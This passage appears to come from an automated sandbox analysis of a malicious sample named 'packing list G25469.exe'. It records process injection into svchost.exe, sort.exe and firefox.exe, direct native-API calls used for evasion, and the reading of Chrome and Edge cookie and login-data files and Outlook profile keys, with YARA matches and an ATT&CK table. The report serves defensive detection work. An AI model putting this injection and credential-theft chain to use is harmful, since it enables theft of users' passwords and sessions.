                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A830 mov eax, dword ptr fs:[00000030h]2_2_0396A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D483A mov eax, dword ptr fs:[00000030h]2_2_039D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D483A mov eax, dword ptr fs:[00000030h]2_2_039D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960854 mov eax, dword ptr fs:[00000030h]2_2_03960854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934859 mov eax, dword ptr fs:[00000030h]2_2_03934859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934859 mov eax, dword ptr fs:[00000030h]2_2_03934859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03942840 mov ecx, dword ptr fs:[00000030h]2_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h]2_2_039BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h]2_2_039BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h]2_2_039C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h]2_2_039C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h]2_2_03962F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h]2_2_03962F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CF80 mov eax, dword ptr fs:[00000030h]2_2_0396CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04FE7 mov eax, dword ptr fs:[00000030h]2_2_03A04FE7
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B6A66C
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B581AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B581AC
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B58189 SetUnhandledExceptionFilter,0_2_00B58189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sort.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: NULL target: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: NULL target: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeThread register set: target process: 4696Jump to behavior
                Source: C:\Windows\SysWOW64\sort.exeThread APC queued: target process: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeJump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C8A008Jump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6B106 LogonUserW,0_2_00B6B106
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B33D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B33D19
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B7411C SendInput,keybd_event,0_2_00B7411C
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B774BB mouse_event,0_2_00B774BB
                Source: C:\Users\user\Desktop\packing list G25469.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\packing list G25469.exe"Jump to behavior
                Source: C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exeProcess created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sort.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B6A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B6A66C
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B771FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B771FA
                Source: RUaXGIhjtGYK.exe, 00000004.00000002.3341835373.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000004.00000000.2447224715.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000007.00000000.2602588944.0000000001561000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: packing list G25469.exe, RUaXGIhjtGYK.exe, 00000004.00000002.3341835373.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000004.00000000.2447224715.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000007.00000000.2602588944.0000000001561000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RUaXGIhjtGYK.exe, 00000004.00000002.3341835373.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000004.00000000.2447224715.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000007.00000000.2602588944.0000000001561000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: packing list G25469.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: RUaXGIhjtGYK.exe, 00000004.00000002.3341835373.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000004.00000000.2447224715.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp, RUaXGIhjtGYK.exe, 00000007.00000000.2602588944.0000000001561000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B565C4 cpuid 0_2_00B565C4
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B8091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00B8091D
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00BAB340 GetUserNameW,0_2_00BAB340
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B61E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B61E8E
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B4DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B4DDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3344117525.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2529387256.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3342301156.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3340903495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2531035516.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3342241743.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2531101341.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3342260873.0000000005000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sort.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: packing list G25469.exeBinary or memory string: WIN_81
                Source: packing list G25469.exeBinary or memory string: WIN_XP
                Source: packing list G25469.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: packing list G25469.exeBinary or memory string: WIN_XPe
                Source: packing list G25469.exeBinary or memory string: WIN_VISTA
                Source: packing list G25469.exeBinary or memory string: WIN_7
                Source: packing list G25469.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3344117525.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2529387256.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3342301156.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3340903495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2531035516.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3342241743.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2531101341.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3342260873.0000000005000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B88C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B88C4F
                Source: C:\Users\user\Desktop\packing list G25469.exeCode function: 0_2_00B8923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B8923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
